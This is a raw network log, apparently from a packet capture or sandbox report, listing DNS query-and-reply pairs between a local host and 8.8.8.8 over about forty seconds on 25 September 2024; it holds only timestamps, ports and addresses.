                                                            Sep 25, 2024 08:32:43.530899048 CEST5527753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:43.537749052 CEST53552778.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:43.537955046 CEST5527753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:43.544920921 CEST53552778.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:43.545120001 CEST5527753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:43.552208900 CEST53552778.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:43.552392960 CEST5527753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:43.561033964 CEST53552778.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:43.664305925 CEST5118353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:43.671456099 CEST53511838.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:43.671662092 CEST5118353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:43.678170919 CEST53511838.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:43.678430080 CEST5118353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:43.684840918 CEST53511838.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:43.685204029 CEST5118353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:43.692507029 CEST53511838.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:43.695975065 CEST5118353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:43.702472925 CEST53511838.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:46.834187984 CEST5702753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:46.841223001 CEST53570278.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:46.843404055 CEST5702753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:46.850332975 CEST53570278.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:46.855416059 CEST5702753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:46.862257957 CEST53570278.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:46.867352962 CEST5702753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:46.873713970 CEST53570278.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:46.878695011 CEST5702753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:46.885675907 CEST53570278.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:47.007249117 CEST5038053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:47.013748884 CEST53503808.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:47.019402027 CEST5038053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:47.026209116 CEST53503808.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:47.027404070 CEST5038053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:47.033785105 CEST53503808.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:47.035356045 CEST5038053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:47.041632891 CEST53503808.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:47.042258024 CEST5038053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:47.048577070 CEST53503808.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.633084059 CEST5615653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.639884949 CEST53561568.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.640115976 CEST5615653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.646352053 CEST53561568.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.646473885 CEST5615653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.653476000 CEST53561568.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.653728008 CEST5615653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.659847975 CEST53561568.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.660089016 CEST5615653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.666378021 CEST53561568.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.776436090 CEST6097153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.783868074 CEST53609718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.784100056 CEST6097153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.791337013 CEST53609718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.793049097 CEST6097153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.800381899 CEST53609718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.801645994 CEST6097153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.808012009 CEST53609718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.808177948 CEST6097153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.814482927 CEST53609718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.937958002 CEST5630853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.944781065 CEST53563088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.944951057 CEST5630853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.951412916 CEST53563088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.951617956 CEST5630853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.958648920 CEST53563088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.958879948 CEST5630853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.965173006 CEST53563088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:51.965384960 CEST5630853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:51.972518921 CEST53563088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.587205887 CEST5126853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.593696117 CEST53512688.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.593888998 CEST5126853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.600245953 CEST53512688.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.600424051 CEST5126853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.606678963 CEST53512688.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.606914043 CEST5126853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.613204956 CEST53512688.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.613390923 CEST5126853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.619612932 CEST53512688.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.747217894 CEST5947553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.753443003 CEST53594758.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.753621101 CEST5947553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.760030985 CEST53594758.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.760173082 CEST5947553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.766567945 CEST53594758.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.766731977 CEST5947553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.773123980 CEST53594758.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.773258924 CEST5947553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.779642105 CEST53594758.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.898706913 CEST6293053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.905093908 CEST53629308.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.905291080 CEST6293053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.912184000 CEST53629308.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.912429094 CEST6293053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.918936014 CEST53629308.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.919084072 CEST6293053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.925968885 CEST53629308.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:55.926112890 CEST6293053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:55.932416916 CEST53629308.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.061032057 CEST6100853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.067974091 CEST53610088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.068155050 CEST6100853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.074388981 CEST53610088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.074536085 CEST6100853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.081233025 CEST53610088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.081372976 CEST6100853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.087583065 CEST53610088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.087717056 CEST6100853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.094332933 CEST53610088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.230093002 CEST5951453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.236711025 CEST53595148.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.236912966 CEST5951453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.243226051 CEST53595148.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.243443966 CEST5951453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.249866962 CEST53595148.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.250072002 CEST5951453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.256441116 CEST53595148.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.256591082 CEST5951453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.270569086 CEST53595148.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.404901981 CEST5307753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.411783934 CEST53530778.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.412008047 CEST5307753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.419038057 CEST53530778.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.419228077 CEST5307753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.425903082 CEST53530778.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.426075935 CEST5307753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.433979034 CEST53530778.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:56.434566021 CEST5307753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:56.442033052 CEST53530778.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:00.807255983 CEST5318853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:00.814125061 CEST53531888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:00.814644098 CEST5318853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:00.821279049 CEST53531888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:00.821748972 CEST5318853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:00.828108072 CEST53531888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:00.828375101 CEST5318853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:00.834410906 CEST53531888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:00.835170984 CEST5318853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:00.842133999 CEST53531888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:00.946994066 CEST5433353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:00.953254938 CEST53543338.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:00.953433037 CEST5433353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:00.960212946 CEST53543338.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:00.960457087 CEST5433353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:00.966607094 CEST53543338.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:00.966914892 CEST5433353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:00.973666906 CEST53543338.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:00.973819971 CEST5433353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:00.979918957 CEST53543338.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.087451935 CEST5538853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.094285965 CEST53553888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.094748974 CEST5538853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.101537943 CEST53553888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.101680994 CEST5538853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.107999086 CEST53553888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.108129978 CEST5538853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.115078926 CEST53553888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.115480900 CEST5538853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.121802092 CEST53553888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.227786064 CEST6062453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.235189915 CEST53606248.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.235565901 CEST6062453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.242177963 CEST53606248.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.242578983 CEST6062453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.249169111 CEST53606248.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.249336004 CEST6062453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.255981922 CEST53606248.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.256171942 CEST6062453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.262707949 CEST53606248.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.373347998 CEST5897453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.379863977 CEST53589748.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.380060911 CEST5897453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.386482954 CEST53589748.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.386780977 CEST5897453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.393058062 CEST53589748.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.393207073 CEST5897453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.400038958 CEST53589748.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.400394917 CEST5897453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.406999111 CEST53589748.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.514189005 CEST5415453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.521114111 CEST53541548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.521316051 CEST5415453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.527854919 CEST53541548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.527993917 CEST5415453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.534178019 CEST53541548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.534363985 CEST5415453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.540690899 CEST53541548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.541975975 CEST5415453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.548307896 CEST53541548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.650716066 CEST5360253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.657249928 CEST53536028.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.657495022 CEST5360253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.664310932 CEST53536028.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.664479971 CEST5360253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.670902967 CEST53536028.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.671051979 CEST5360253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.677809954 CEST53536028.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.678002119 CEST5360253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.684314013 CEST53536028.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.814707994 CEST4926353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.821974993 CEST53492638.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.822163105 CEST4926353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.829155922 CEST53492638.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.829304934 CEST4926353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.836644888 CEST53492638.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.836836100 CEST4926353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.844038010 CEST53492638.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:01.844233990 CEST4926353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:01.851032972 CEST53492638.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:05.349203110 CEST6098153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:05.355994940 CEST53609818.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:05.358597994 CEST6098153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:05.365155935 CEST53609818.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:05.365341902 CEST6098153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:05.372524977 CEST53609818.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:05.372787952 CEST6098153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:05.379164934 CEST53609818.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:05.379395008 CEST6098153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:05.385793924 CEST53609818.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:08.876607895 CEST5116153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:09.092854977 CEST53511618.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:09.095382929 CEST5116153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:09.101809025 CEST53511618.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:13.880588055 CEST5035753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:13.886909008 CEST53503578.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:13.887178898 CEST5035753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:13.894226074 CEST53503578.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:13.894483089 CEST5035753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:13.900816917 CEST53503578.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:13.901243925 CEST5035753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:13.907593966 CEST53503578.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:13.907952070 CEST5035753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:13.917151928 CEST53503578.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:14.032226086 CEST5829153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:14.039764881 CEST53582918.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:14.039964914 CEST5829153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:14.047144890 CEST53582918.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:14.047360897 CEST5829153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:14.053622961 CEST53582918.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:14.053847075 CEST5829153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:14.060082912 CEST53582918.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:14.060278893 CEST5829153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:14.066783905 CEST53582918.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.079668045 CEST5212953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.086016893 CEST53521298.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.086178064 CEST5212953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.092629910 CEST53521298.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.092776060 CEST5212953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.099132061 CEST53521298.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.099344015 CEST5212953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.106508017 CEST53521298.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.106741905 CEST5212953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.113135099 CEST53521298.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.227175951 CEST6012253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.233655930 CEST53601228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.233823061 CEST6012253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.240210056 CEST53601228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.240334034 CEST6012253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.247436047 CEST53601228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.247565031 CEST6012253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.253933907 CEST53601228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.254093885 CEST6012253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.260505915 CEST53601228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.372754097 CEST6476253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.380570889 CEST53647628.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.380732059 CEST6476253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.387099981 CEST53647628.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.387242079 CEST6476253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.393565893 CEST53647628.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.393675089 CEST6476253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.400353909 CEST53647628.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.400473118 CEST6476253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.407394886 CEST53647628.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.517427921 CEST5306353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.524606943 CEST53530638.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.524848938 CEST5306353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.531156063 CEST53530638.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.531373024 CEST5306353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.537791967 CEST53530638.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:18.537982941 CEST5306353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:18.544979095 CEST53530638.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:22.593125105 CEST6033353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:22.807673931 CEST53603338.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:22.807905912 CEST6033353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:22.814913988 CEST53603338.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:22.845366001 CEST6033353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:22.852286100 CEST53603338.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:22.852489948 CEST6033353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:22.859412909 CEST53603338.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:22.859565973 CEST6033353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:22.865988970 CEST53603338.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:22.976861000 CEST6303653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:22.983084917 CEST53630368.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:22.983252048 CEST6303653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:22.989814043 CEST53630368.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:22.989979029 CEST6303653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:22.997374058 CEST53630368.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:22.997534990 CEST6303653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.005076885 CEST53630368.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.005250931 CEST6303653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.012497902 CEST53630368.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.115525007 CEST5624353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.122025013 CEST53562438.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.122200012 CEST5624353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.129343033 CEST53562438.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.129507065 CEST5624353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.135891914 CEST53562438.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.136035919 CEST5624353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.143105030 CEST53562438.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.143282890 CEST5624353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.149703026 CEST53562438.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.677670956 CEST6268953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.684319019 CEST53626898.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.701648951 CEST6268953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.708906889 CEST53626898.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.709336042 CEST6268953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.715868950 CEST53626898.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.717345953 CEST6268953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.723972082 CEST53626898.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.724184990 CEST6268953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.730546951 CEST53626898.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.835678101 CEST4933953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.842703104 CEST53493398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.843081951 CEST4933953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.852416039 CEST53493398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.852916002 CEST4933953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.859345913 CEST53493398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.860075951 CEST4933953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.867271900 CEST53493398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:23.867595911 CEST4933953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:23.874206066 CEST53493398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:26.941859007 CEST6099453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:26.948216915 CEST53609948.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:26.948400021 CEST6099453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:26.955164909 CEST53609948.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:26.955303907 CEST6099453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:26.961615086 CEST53609948.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:26.961864948 CEST6099453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:26.968224049 CEST53609948.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:26.968430042 CEST6099453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:26.974854946 CEST53609948.8.8.8192.168.2.22
